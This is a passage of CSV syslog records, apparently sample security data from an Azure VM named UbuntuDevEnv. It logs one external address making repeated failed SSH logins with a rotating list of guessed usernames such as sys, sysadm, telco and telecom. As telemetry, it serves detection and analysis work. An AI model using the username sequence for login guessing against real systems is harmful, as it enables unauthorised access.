+3156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:51,UbuntuDevEnv,2019-06-28 05:27:51,auth,UbuntuDevEnv,info,"Disconnecting invalid user svn 193.201.224.232 port 33047: Change of username or service not allowed: (svn,ssh-connection) -> (Sweex,ssh-connection) [preauth]",96031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,svn,193.201.224.2,33047,,
+3157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:52,UbuntuDevEnv,2019-06-28 05:27:51,auth,UbuntuDevEnv,info,Invalid user Sweex from 193.201.224.232 port 38667,96048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Sweex,193.201.224.2,38667,,
+3158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:52,UbuntuDevEnv,2019-06-28 05:27:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:52,UbuntuDevEnv,2019-06-28 05:27:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:53,UbuntuDevEnv,2019-06-28 05:27:53,auth,UbuntuDevEnv,info,Failed password for invalid user Sweex from 193.201.224.232 port 38667 ssh2,96048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Sweex,193.201.224.2,38667,,
+3161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:55,UbuntuDevEnv,2019-06-28 05:27:54,auth,UbuntuDevEnv,info,"Disconnecting invalid user Sweex 193.201.224.232 port 38667: Change of username or service not allowed: (Sweex,ssh-connection) -> (sys,ssh-connection) [preauth]",96048,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Sweex,193.201.224.2,38667,,
+3162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:56,UbuntuDevEnv,2019-06-28 05:27:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232  user=sys,96063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sys,193.201.224.2,,0,
+3163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:58,UbuntuDevEnv,2019-06-28 05:27:58,auth,UbuntuDevEnv,info,Failed password for sys from 193.201.224.232 port 42330 ssh2,96063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,193.201.224.2,42330,,
+3164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:27:58,UbuntuDevEnv,2019-06-28 05:27:58,auth,UbuntuDevEnv,info,"Disconnecting authenticating user sys 193.201.224.232 port 42330: Change of username or service not allowed: (sys,ssh-connection) -> (sysadm,ssh-connection) [preauth]",96063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,sys,193.201.224.2,42330,,
+3165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:02,UbuntuDevEnv,2019-06-28 05:28:02,auth,UbuntuDevEnv,info,Invalid user sysadm from 193.201.224.232 port 45787,96073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadm,193.201.224.2,45787,,
+3166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:02,UbuntuDevEnv,2019-06-28 05:28:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:02,UbuntuDevEnv,2019-06-28 05:28:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:04,UbuntuDevEnv,2019-06-28 05:28:03,auth,UbuntuDevEnv,info,Failed password for invalid user sysadm from 193.201.224.232 port 45787 ssh2,96073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadm,193.201.224.2,45787,,
+3169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:04,UbuntuDevEnv,2019-06-28 05:28:04,auth,UbuntuDevEnv,info,"Disconnecting invalid user sysadm 193.201.224.232 port 45787: Change of username or service not allowed: (sysadm,ssh-connection) -> (SYSADM,ssh-connection) [preauth]",96073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadm,193.201.224.2,45787,,
+3170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:05,UbuntuDevEnv,2019-06-28 05:28:05,auth,UbuntuDevEnv,info,Invalid user SYSADM from 193.201.224.232 port 10694,96095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,SYSADM,193.201.224.2,10694,,
+3171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:05,UbuntuDevEnv,2019-06-28 05:28:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:05,UbuntuDevEnv,2019-06-28 05:28:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:07,UbuntuDevEnv,2019-06-28 05:28:06,auth,UbuntuDevEnv,info,Failed password for invalid user SYSADM from 193.201.224.232 port 10694 ssh2,96095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,SYSADM,193.201.224.2,10694,,
+3174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:07,UbuntuDevEnv,2019-06-28 05:28:07,auth,UbuntuDevEnv,info,"Disconnecting invalid user SYSADM 193.201.224.232 port 10694: Change of username or service not allowed: (SYSADM,ssh-connection) -> (sysadm,ssh-connection) [preauth]",96095,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,SYSADM,193.201.224.2,10694,,
+3175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:08,UbuntuDevEnv,2019-06-28 05:28:07,auth,UbuntuDevEnv,info,Invalid user sysadm from 193.201.224.232 port 14762,96111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadm,193.201.224.2,14762,,
+3176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:08,UbuntuDevEnv,2019-06-28 05:28:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:08,UbuntuDevEnv,2019-06-28 05:28:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:10,UbuntuDevEnv,2019-06-28 05:28:10,auth,UbuntuDevEnv,info,Failed password for invalid user sysadm from 193.201.224.232 port 14762 ssh2,96111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadm,193.201.224.2,14762,,
+3179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:10,UbuntuDevEnv,2019-06-28 05:28:10,auth,UbuntuDevEnv,info,"Disconnecting invalid user sysadm 193.201.224.232 port 14762: Change of username or service not allowed: (sysadm,ssh-connection) -> (sysadmin,ssh-connection) [preauth]",96111,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadm,193.201.224.2,14762,,
+3180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:11,UbuntuDevEnv,2019-06-28 05:28:11,auth,UbuntuDevEnv,info,Invalid user sysadmin from 193.201.224.232 port 19403,96124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,193.201.224.2,19403,,
+3181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:11,UbuntuDevEnv,2019-06-28 05:28:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:11,UbuntuDevEnv,2019-06-28 05:28:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:14,UbuntuDevEnv,2019-06-28 05:28:13,auth,UbuntuDevEnv,info,Failed password for invalid user sysadmin from 193.201.224.232 port 19403 ssh2,96124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,193.201.224.2,19403,,
+3184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:14,UbuntuDevEnv,2019-06-28 05:28:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:16,UbuntuDevEnv,2019-06-28 05:28:15,auth,UbuntuDevEnv,info,Failed password for invalid user sysadmin from 193.201.224.232 port 19403 ssh2,96124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,193.201.224.2,19403,,
+3186,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:17,UbuntuDevEnv,2019-06-28 05:28:16,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3187,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:17,UbuntuDevEnv,2019-06-28 05:28:16,auth,UbuntuDevEnv,info,"Disconnecting invalid user sysadmin 193.201.224.232 port 19403: Change of username or service not allowed: (sysadmin,ssh-connection) -> (system,ssh-connection) [preauth]",96124,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sysadmin,193.201.224.2,19403,,
+3188,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:20,UbuntuDevEnv,2019-06-28 05:28:20,auth,UbuntuDevEnv,info,Invalid user system from 193.201.224.232 port 52250,96146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,system,193.201.224.2,52250,,
+3189,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:20,UbuntuDevEnv,2019-06-28 05:28:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3190,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:20,UbuntuDevEnv,2019-06-28 05:28:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3191,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:22,UbuntuDevEnv,2019-06-28 05:28:21,auth,UbuntuDevEnv,info,Failed password for invalid user system from 193.201.224.232 port 52250 ssh2,96146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,system,193.201.224.2,52250,,
+3192,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:22,UbuntuDevEnv,2019-06-28 05:28:22,auth,UbuntuDevEnv,info,"Disconnecting invalid user system 193.201.224.232 port 52250: Change of username or service not allowed: (system,ssh-connection) -> (target,ssh-connection) [preauth]",96146,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,system,193.201.224.2,52250,,
+3193,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:25,UbuntuDevEnv,2019-06-28 05:28:25,auth,UbuntuDevEnv,info,Invalid user target from 193.201.224.232 port 60371,96167,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,target,193.201.224.2,60371,,
+3194,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:26,UbuntuDevEnv,2019-06-28 05:28:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96167,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3195,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:26,UbuntuDevEnv,2019-06-28 05:28:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96167,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3196,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:28,UbuntuDevEnv,2019-06-28 05:28:27,auth,UbuntuDevEnv,info,Failed password for invalid user target from 193.201.224.232 port 60371 ssh2,96167,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,target,193.201.224.2,60371,,
+3197,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:28,UbuntuDevEnv,2019-06-28 05:28:27,auth,UbuntuDevEnv,info,"Disconnecting invalid user target 193.201.224.232 port 60371: Change of username or service not allowed: (target,ssh-connection) -> (tech,ssh-connection) [preauth]",96167,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,target,193.201.224.2,60371,,
+3198,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:34,UbuntuDevEnv,2019-06-28 05:28:33,auth,UbuntuDevEnv,info,Invalid user tech from 193.201.224.232 port 1788,96191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tech,193.201.224.2,1788,,
+3199,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:34,UbuntuDevEnv,2019-06-28 05:28:33,auth,UbuntuDevEnv,info,Failed none for invalid user tech from 193.201.224.232 port 1788 ssh2,96191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tech,193.201.224.2,1788,,
+3200,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:36,UbuntuDevEnv,2019-06-28 05:28:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3201,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:36,UbuntuDevEnv,2019-06-28 05:28:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3202,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:38,UbuntuDevEnv,2019-06-28 05:28:38,auth,UbuntuDevEnv,info,Failed password for invalid user tech from 193.201.224.232 port 1788 ssh2,96191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tech,193.201.224.2,1788,,
+3203,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:38,UbuntuDevEnv,2019-06-28 05:28:38,auth,UbuntuDevEnv,info,"Disconnecting invalid user tech 193.201.224.232 port 1788: Change of username or service not allowed: (tech,ssh-connection) -> (telco,ssh-connection) [preauth]",96191,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tech,193.201.224.2,1788,,
+3204,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:43,UbuntuDevEnv,2019-06-28 05:28:42,auth,UbuntuDevEnv,info,Invalid user telco from 193.201.224.232 port 37610,96232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telco,193.201.224.2,37610,,
+3205,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:43,UbuntuDevEnv,2019-06-28 05:28:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3206,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:43,UbuntuDevEnv,2019-06-28 05:28:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3207,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:45,UbuntuDevEnv,2019-06-28 05:28:45,auth,UbuntuDevEnv,info,Failed password for invalid user telco from 193.201.224.232 port 37610 ssh2,96232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telco,193.201.224.2,37610,,
+3208,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:51,UbuntuDevEnv,2019-06-28 05:28:50,auth,UbuntuDevEnv,info,"Disconnecting invalid user telco 193.201.224.232 port 37610: Change of username or service not allowed: (telco,ssh-connection) -> (telecom,ssh-connection) [preauth]",96232,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telco,193.201.224.2,37610,,
+3209,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:52,UbuntuDevEnv,2019-06-28 05:28:51,auth,UbuntuDevEnv,info,Invalid user telecom from 193.201.224.232 port 11734,96273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telecom,193.201.224.2,11734,,
+3210,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:52,UbuntuDevEnv,2019-06-28 05:28:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3211,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:52,UbuntuDevEnv,2019-06-28 05:28:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,96273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+3212,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:54,UbuntuDevEnv,2019-06-28 05:28:53,auth,UbuntuDevEnv,info,Failed password for invalid user telecom from 193.201.224.232 port 11734 ssh2,96273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telecom,193.201.224.2,11734,,
+3213,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:28:54,UbuntuDevEnv,2019-06-28 05:28:54,auth,UbuntuDevEnv,info,"Disconnecting invalid user telecom 193.201.224.232 port 11734: Change of username or service not allowed: (telecom,ssh-connection) -> (telecomadmin,ssh-connection) [preauth]",96273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,telecom,193.201.224.2,11734,,
